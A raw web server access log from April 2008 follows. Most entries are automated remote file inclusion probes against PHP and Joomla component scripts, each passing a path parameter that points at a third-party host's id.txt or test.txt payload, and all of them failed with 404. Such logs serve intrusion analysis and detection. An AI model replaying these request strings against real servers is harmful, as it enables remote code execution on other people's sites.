209.92.158.55 - - [13/Apr/2008:22:13:38 -0600] "GET /includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.92.158.55 - - [13/Apr/2008:22:13:39 -0600] "GET /logs/includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.92.158.55 - - [13/Apr/2008:22:15:39 -0600] "GET /includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.92.158.55 - - [13/Apr/2008:22:15:39 -0600] "GET /logs/includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.200.207.18 - - [13/Apr/2008:22:18:10 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:22:18:11 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
69.89.27.217 - - [13/Apr/2008:22:19:39 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
69.89.27.217 - - [13/Apr/2008:22:19:39 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
201.134.249.164 - - [13/Apr/2008:22:22:05 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
201.134.249.164 - - [13/Apr/2008:22:22:05 -0600] "GET /modules/My_eGallery/index.php?basepath=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
72.29.87.105 - - [13/Apr/2008:22:22:50 -0600] "GET /logs/error_log.20080406//Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
72.29.87.105 - - [13/Apr/2008:22:22:50 -0600] "GET /logs/error_log.20080406//Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
72.29.87.105 - - [13/Apr/2008:22:22:50 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
72.29.87.105 - - [13/Apr/2008:22:22:50 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
72.29.87.105 - - [13/Apr/2008:22:22:50 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
72.29.87.105 - - [13/Apr/2008:22:22:50 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
200.201.48.20 - - [13/Apr/2008:22:22:58 -0600] "GET /logs/test.php?page=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 219 "-" "libwww-perl/5.803"
200.201.48.20 - - [13/Apr/2008:22:23:00 -0600] "GET /logs/test.php?page=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 219 "-" "libwww-perl/5.803"
200.201.48.20 - - [13/Apr/2008:22:23:02 -0600] "GET /test.php?page=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 214 "-" "libwww-perl/5.803"
200.201.48.20 - - [13/Apr/2008:22:23:02 -0600] "GET /test.php?page=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 214 "-" "libwww-perl/5.803"
74.53.197.2 - - [13/Apr/2008:22:23:10 -0600] "GET /logs/access_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:22:23:11 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:22:23:11 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
72.232.255.166 - - [13/Apr/2008:22:23:22 -0600] "GET /logs/access_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
72.232.255.166 - - [13/Apr/2008:22:23:22 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
72.232.255.166 - - [13/Apr/2008:22:23:22 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
74.53.197.2 - - [13/Apr/2008:22:24:02 -0600] "GET /logs/error_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
66.212.16.163 - - [13/Apr/2008:22:24:17 -0600] "GET /logs/access_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
66.212.16.163 - - [13/Apr/2008:22:24:17 -0600] "GET /logs/access_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
66.212.16.163 - - [13/Apr/2008:22:24:17 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
66.212.16.163 - - [13/Apr/2008:22:24:17 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
66.212.16.163 - - [13/Apr/2008:22:24:17 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.212.16.163 - - [13/Apr/2008:22:24:17 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
72.232.255.166 - - [13/Apr/2008:22:24:25 -0600] "GET /logs/error_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
66.232.102.34 - - [13/Apr/2008:22:24:53 -0600] "GET /includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
66.232.102.34 - - [13/Apr/2008:22:24:53 -0600] "GET /logs/includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
66.212.16.163 - - [13/Apr/2008:22:25:20 -0600] "GET /logs/error_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
66.212.16.163 - - [13/Apr/2008:22:25:22 -0600] "GET /logs/error_log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
195.155.232.37 - - [13/Apr/2008:22:27:06 -0600] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.marcokrasenberg.nl/images/resp.txt??? HTTP/1.1" 404 253 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
195.155.232.37 - - [13/Apr/2008:22:27:06 -0600] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.marcokrasenberg.nl/images/resp.txt??? HTTP/1.1" 404 258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.29.87.105 - - [13/Apr/2008:22:27:10 -0600] "GET /logs/access_log//Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
72.29.87.105 - - [13/Apr/2008:22:27:13 -0600] "GET /logs/access_log//Neos_Chronos/header.php?base_folder=http://www.spicyradio.net/plugins/p2006???????? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
72.3.238.151 - - [13/Apr/2008:22:28:11 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
72.3.238.151 - - [13/Apr/2008:22:28:11 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
212.182.50.50 - - [13/Apr/2008:22:30:16 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
212.182.50.50 - - [13/Apr/2008:22:30:16 -0600] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
201.134.249.164 - - [13/Apr/2008:22:30:27 -0600] "GET /logs/access_log.20080330/modules/My_eGallery/index.php?basepath=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:22:31:07 -0600] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
200.138.218.40 - - [13/Apr/2008:22:31:21 -0600] "GET /logs/access_log/main.php?pagina=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:22:31:21 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
200.138.218.40 - - [13/Apr/2008:22:31:21 -0600] "GET /main.php?pagina=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
200.138.218.40 - - [13/Apr/2008:22:31:22 -0600] "GET /logs/main.php?pagina=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:22:31:39 -0600] "GET /logs//login.php?dir=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:22:31:39 -0600] "GET //login.php?dir=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
201.134.249.164 - - [13/Apr/2008:22:32:45 -0600] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
72.232.255.166 - - [13/Apr/2008:22:33:01 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
72.232.255.166 - - [13/Apr/2008:22:33:01 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
74.53.197.2 - - [13/Apr/2008:22:33:10 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:22:33:10 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
160.99.12.231 - - [13/Apr/2008:22:35:48 -0600] "GET /logs/access_log/sub.php?menu=http://medisana.co.kr/test?? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
160.99.12.231 - - [13/Apr/2008:22:35:49 -0600] "GET /sub.php?menu=http://medisana.co.kr/test?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
160.99.12.231 - - [13/Apr/2008:22:35:49 -0600] "GET /logs/sub.php?menu=http://medisana.co.kr/test?? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
195.82.99.126 - - [13/Apr/2008:22:38:54 -0600] "GET //modules/xfsection/modify.php?dir_module=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
195.82.99.126 - - [13/Apr/2008:22:38:54 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
130.15.26.30 - - [13/Apr/2008:22:39:19 -0600] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
91.185.193.111 - - [13/Apr/2008:22:41:00 -0600] "GET /logs//login.php?dir=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:22:41:00 -0600] "GET //login.php?dir=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
72.3.238.151 - - [13/Apr/2008:22:41:51 -0600] "GET /logs/error_log.20080330/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
72.3.238.151 - - [13/Apr/2008:22:41:51 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
72.3.238.151 - - [13/Apr/2008:22:41:51 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
72.3.238.151 - - [13/Apr/2008:22:43:40 -0600] "GET /logs/error_log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
65.55.208.110 - - [13/Apr/2008:22:46:37 -0600] "GET /robots.txt HTTP/1.1" 404 216 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.110 - - [13/Apr/2008:22:46:37 -0600] "GET /logs/access_log.20080217 HTTP/1.1" 404 230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.110 - - [13/Apr/2008:22:48:54 -0600] "GET /logs/access_log.20080302 HTTP/1.1" 404 230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
91.121.4.48 - - [13/Apr/2008:22:52:16 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/trovao/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
91.121.4.48 - - [13/Apr/2008:22:52:17 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/trovao/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
220.77.196.202 - - [13/Apr/2008:22:54:19 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021"
91.121.4.48 - - [13/Apr/2008:22:55:54 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/trovao/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
91.121.4.48 - - [13/Apr/2008:22:55:54 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/trovao/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
91.121.4.48 - - [13/Apr/2008:22:55:54 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/trovao/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
91.121.4.48 - - [13/Apr/2008:22:57:00 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/trovao/id.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
130.15.26.30 - - [13/Apr/2008:23:05:59 -0600] "GET /logs/access_log.20080330//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
130.15.26.30 - - [13/Apr/2008:23:05:59 -0600] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.810"
81.23.229.105 - - [13/Apr/2008:23:07:10 -0600] "GET //admin.php?vwar_root=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
81.23.229.105 - - [13/Apr/2008:23:07:10 -0600] "GET /logs//admin.php?vwar_root=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
80.68.203.22 - - [13/Apr/2008:23:07:11 -0600] "GET /logs/access_log.20080127/scanhttp://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:07:12 -0600] "GET /scanhttp://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:07:15 -0600] "GET /logs/scanhttp://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:08:32 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:08:32 -0600] "GET //skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:08:33 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:08:33 -0600] "GET //skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
69.93.107.242 - - [13/Apr/2008:23:09:23 -0600] "GET //admin.php?vwar_root=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? HTTP/1.1" 404 228 "-" "Avant Browser (http://www.avantbrowser.com)"
69.93.107.242 - - [13/Apr/2008:23:09:23 -0600] "GET /logs//admin.php?vwar_root=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? HTTP/1.1" 404 233 "-" "Avant Browser (http://www.avantbrowser.com)"
80.68.203.22 - - [13/Apr/2008:23:10:21 -0600] "GET /logs/access_log.20080127/scanhttp://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:10:26 -0600] "GET /scanhttp://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
80.68.203.22 - - [13/Apr/2008:23:10:26 -0600] "GET /logs/scanhttp://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:10:33 -0600] "GET /error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:11:01 -0600] "GET /logs/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:11:01 -0600] "GET /error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
81.209.147.100 - - [13/Apr/2008:23:11:05 -0600] "GET /logs/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
81.209.147.100 - - [13/Apr/2008:23:11:06 -0600] "GET /error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
85.214.73.237 - - [13/Apr/2008:23:11:12 -0600] "GET /logs/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:11:12 -0600] "GET /error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
87.230.6.49 - - [13/Apr/2008:23:12:14 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.76"
87.230.6.49 - - [13/Apr/2008:23:12:14 -0600] "GET //skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.76"
212.13.42.169 - - [13/Apr/2008:23:12:19 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:23:12:19 -0600] "GET /logs/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:23:12:19 -0600] "GET /error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
212.13.42.169 - - [13/Apr/2008:23:12:25 -0600] "GET //Neos_Chronos/header.php?base_folder=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
87.230.6.49 - - [13/Apr/2008:23:13:10 -0600] "GET /logs/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
87.230.6.49 - - [13/Apr/2008:23:13:10 -0600] "GET /error.php?dir=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.76"
212.182.50.50 - - [13/Apr/2008:23:13:59 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
212.182.50.50 - - [13/Apr/2008:23:13:59 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.93.107.242 - - [13/Apr/2008:23:15:24 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:23:15:24 -0600] "GET //skin/zero_vote/error.php?dir=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
204.15.248.10 - - [13/Apr/2008:23:15:26 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ibukimasta.com/test.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
204.15.248.10 - - [13/Apr/2008:23:15:27 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ibukimasta.com/test.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
81.23.229.105 - - [13/Apr/2008:23:17:10 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
81.23.229.105 - - [13/Apr/2008:23:17:10 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
69.93.107.242 - - [13/Apr/2008:23:18:17 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? HTTP/1.1" 404 238 "-" "Avant Browser (http://www.avantbrowser.com)"
69.93.107.242 - - [13/Apr/2008:23:18:17 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? HTTP/1.1" 404 233 "-" "Avant Browser (http://www.avantbrowser.com)"
85.214.73.237 - - [13/Apr/2008:23:19:22 -0600] "GET /logs/access_log//init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:19:22 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
85.214.73.237 - - [13/Apr/2008:23:19:22 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
200.1.202.61 - - [13/Apr/2008:23:20:50 -0600] "GET /logs/index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
200.1.202.61 - - [13/Apr/2008:23:20:51 -0600] "GET /index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
85.214.73.237 - - [13/Apr/2008:23:21:13 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.allroundhealth.org//images/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
200.1.202.61 - - [13/Apr/2008:23:21:47 -0600] "GET /logs/port.php?content=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
